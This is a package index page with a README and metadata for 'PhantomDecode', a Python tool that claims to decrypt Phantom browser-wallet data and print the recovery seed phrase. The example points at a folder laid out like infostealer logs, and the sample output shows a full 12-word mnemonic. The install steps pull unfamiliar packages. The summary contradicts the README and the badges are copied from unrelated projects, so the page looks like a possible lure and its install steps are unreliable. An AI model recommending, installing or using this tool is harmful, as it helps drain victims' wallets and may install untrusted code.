# PhantomDecode
[![N|Solid](https://cldup.com/dTxpPi9lDf.thumb.png)](https://nodesource.com/products/nsolid)
![](https://img.shields.io/github/stars/pandao/editor.md.svg) ![](https://img.shields.io/github/forks/pandao/editor.md.svg) ![](https://img.shields.io/github/tag/pandao/editor.md.svg) ![](https://img.shields.io/github/release/pandao/editor.md.svg) ![](https://img.shields.io/github/issues/pandao/editor.md.svg) ![](https://img.shields.io/bower/v/editor.md.svg)
Simple Tools for decode Phantom wallet data, from extensions wallet, Phantom - extract mnemonic phrase from you encrypted data with password.
## Installation
Install the dependencies and devDependencies and start the server.
**Python** 3.10.4 | https://www.python.org/downloads/ |** Add python.exe to PATH** | checkbox.
###### python -m pip install --upgrade pip
###### pip install -r requirements.txt
```
PyNaCl >= 1.5.0
base58 >= 2.1.1
pycryptodome >= 3.20.0
Cipherbcrypt >= 1.2
bip-utils >= 2.9.1
ccl-leveldb >= 1.0
```
or u can install per one libs:
```sh
pip install PyNaCl | PyNaCl 1.5.0
pip install base58 | base58 2.1.1
pip install pycryptodome | pycryptodome 3.20.0
pip install Cipherbcrypt | Cipherbcrypt 1.2
pip install bip_utils | bip-utils 2.9.1
pip install ccl-leveldb | ccl-leveldb 1.0
```
## Example
```python
path = r"C:/Users/Root/Desktop/nLogs\4)_64da69d82f8e45c3a154479bdc5ec5d0\Wallets\Phantom_Chrome_Default"
password = 'Topsecret'
result = findldb(path)
raw_data = phmdecode(password, result)
print(raw_data)
```
##Output:
```
{'version': 1, 'identifier': 'ef7ee9f9e51cd3b8c4a74827dc226f52a1828979640d77e623a3eb9a54a38af7', 'name': 'Phantom Seed', 'entropy': {'0': 213, '1': 40, '2': 95, '3': 131, '4': 75, '5': 191, '6': 243, '7': 65, '8': 254, '9': 34, '10': 248, '11': 66, '12': 213, '13': 82, '14': 147, '15': 39}}
{'status': True, 'txt': 'Successful', 'data': ['ravioli seek one result caban end ancient index mountain small almost garden']}
```
For more information, see [docs.python-guide.org](http://docs.python-guide.org "docs.python-guide.org").
## License
MIT
>Decoder master project (c)
Raw data
{
"_id": null,
"home_page": "",
"name": "PhantomDecode",
"maintainer": "",
"docs_url": null,
"requires_python": ">=3.7,<4.0",
"maintainer_email": "",
"keywords": "extensions,phantom,walletdecode,solana,evm,crypto,decrypt,wallet",
"author": "BitLogic",
"author_email": "BitLogic@hash.io",
"download_url": "https://files.pythonhosted.org/packages/36/5a/b57c010cef477a44af48dd12d529dd04da11b5764da46021707c869e591d/phantomdecode-1.0.tar.gz",
"platform": null,
"description": "# PhantomDecode\n[![N|Solid](https://cldup.com/dTxpPi9lDf.thumb.png)](https://nodesource.com/products/nsolid)\n\n![](https://img.shields.io/github/stars/pandao/editor.md.svg) ![](https://img.shields.io/github/forks/pandao/editor.md.svg) ![](https://img.shields.io/github/tag/pandao/editor.md.svg) ![](https://img.shields.io/github/release/pandao/editor.md.svg) ![](https://img.shields.io/github/issues/pandao/editor.md.svg) ![](https://img.shields.io/bower/v/editor.md.svg)\n\nSimple Tools for decode Phantom wallet data, from extensions wallet, Phantom - extract mnemonic phrase from you encrypted data with password.\n\n\n## Installation\nInstall the dependencies and devDependencies and start the server.\n**Python** 3.10.4 | https://www.python.org/downloads/ |** Add python.exe to PATH** | checkbox.\n\n###### python -m pip install --upgrade pip\n###### pip install -r requirements.txt\n```\nPyNaCl >= 1.5.0\nbase58 >= 2.1.1\npycryptodome >= 3.20.0\nCipherbcrypt >= 1.2\nbip-utils >= 2.9.1\nccl-leveldb >= 1.0\n```\nor u can install per one libs:\n```sh\npip install PyNaCl\t\t| PyNaCl 1.5.0\npip install base58 \t\t| base58 2.1.1\npip install pycryptodome\t| pycryptodome 3.20.0\npip install Cipherbcrypt\t| Cipherbcrypt 1.2\npip install bip_utils\t\t| bip-utils 2.9.1\npip install ccl-leveldb\t| ccl-leveldb 1.0\n```\n\n\n## Example\n\n```python\n\npath = r\"C:/Users/Root/Desktop/nLogs\\4)_64da69d82f8e45c3a154479bdc5ec5d0\\Wallets\\Phantom_Chrome_Default\"\npassword = 'Topsecret'\nresult = findldb(path)\nraw_data = phmdecode(password, result)\nprint(raw_data)\n\n```\n##Output:\n```\n{'version': 1, 'identifier': 'ef7ee9f9e51cd3b8c4a74827dc226f52a1828979640d77e623a3eb9a54a38af7', 'name': 'Phantom Seed', 'entropy': {'0': 213, '1': 40, '2': 95, '3': 131, '4': 75, '5': 191, '6': 243, '7': 65, '8': 254, '9': 34, '10': 248, '11': 66, '12': 213, '13': 82, '14': 147, '15': 39}}\n{'status': True, 'txt': 'Successful', 'data': ['ravioli seek one result caban end ancient index mountain small almost garden']}\n```\n\n\nFor more information, see [docs.python-guide.org](http://docs.python-guide.org \"docs.python-guide.org\").\n\n\n\n## License\nMIT\n>Decoder master project (c)\n",
"bugtrack_url": null,
"license": "MIT",
"summary": "Simple Tools for decode crypto data, from extensions wallet, Metamask, Ronin, Brawe, etc.",
"version": "1.0",
"project_urls": null,
"split_keywords": [
"extensions",
"phantom",
"walletdecode",
"solana",
"evm",
"crypto",
"decrypt",
"wallet"
],
"urls": [
{
"comment_text": "",
"digests": {
"blake2b_256": "24f178e619cefb0610eedcd8dd56379634b2a01d80f2ef6c75522e4ca9c08f5d",
"md5": "d97c56255f7ec9749de2ba13cdbef377",
"sha256": "efc18652259cd77a2b40ef64674f50bedd5ff9df06603f26723928f33da91e57"
},
"downloads": -1,
"filename": "phantomdecode-1.0-py3-none-any.whl",
"has_sig": false,
"md5_digest": "d97c56255f7ec9749de2ba13cdbef377",
"packagetype": "bdist_wheel",
"python_version": "py3",
"requires_python": ">=3.7,<4.0",
"size": 4074,
"upload_time": "2024-03-04T19:16:13",
"upload_time_iso_8601": "2024-03-04T19:16:13.245062Z",
"url": "https://files.pythonhosted.org/packages/24/f1/78e619cefb0610eedcd8dd56379634b2a01d80f2ef6c75522e4ca9c08f5d/phantomdecode-1.0-py3-none-any.whl",
"yanked": false,
"yanked_reason": null
},
{
"comment_text": "",
"digests": {
"blake2b_256": "365ab57c010cef477a44af48dd12d529dd04da11b5764da46021707c869e591d",
"md5": "c00cf5cb6176edfb890d338dc3312516",
"sha256": "e2846a495e8c6cf155ba1d71fe43e60369b07535cd67d8522a4abeee6e2b882a"
},
"downloads": -1,
"filename": "phantomdecode-1.0.tar.gz",
"has_sig": false,
"md5_digest": "c00cf5cb6176edfb890d338dc3312516",
"packagetype": "sdist",
"python_version": "source",
"requires_python": ">=3.7,<4.0",
"size": 3755,
"upload_time": "2024-03-04T19:16:15",
"upload_time_iso_8601": "2024-03-04T19:16:15.042710Z",
"url": "https://files.pythonhosted.org/packages/36/5a/b57c010cef477a44af48dd12d529dd04da11b5764da46021707c869e591d/phantomdecode-1.0.tar.gz",
"yanked": false,
"yanked_reason": null
}
],
"upload_time": "2024-03-04 19:16:15",
"github": false,
"gitlab": false,
"bitbucket": false,
"codeberg": false,
"lcname": "phantomdecode"
}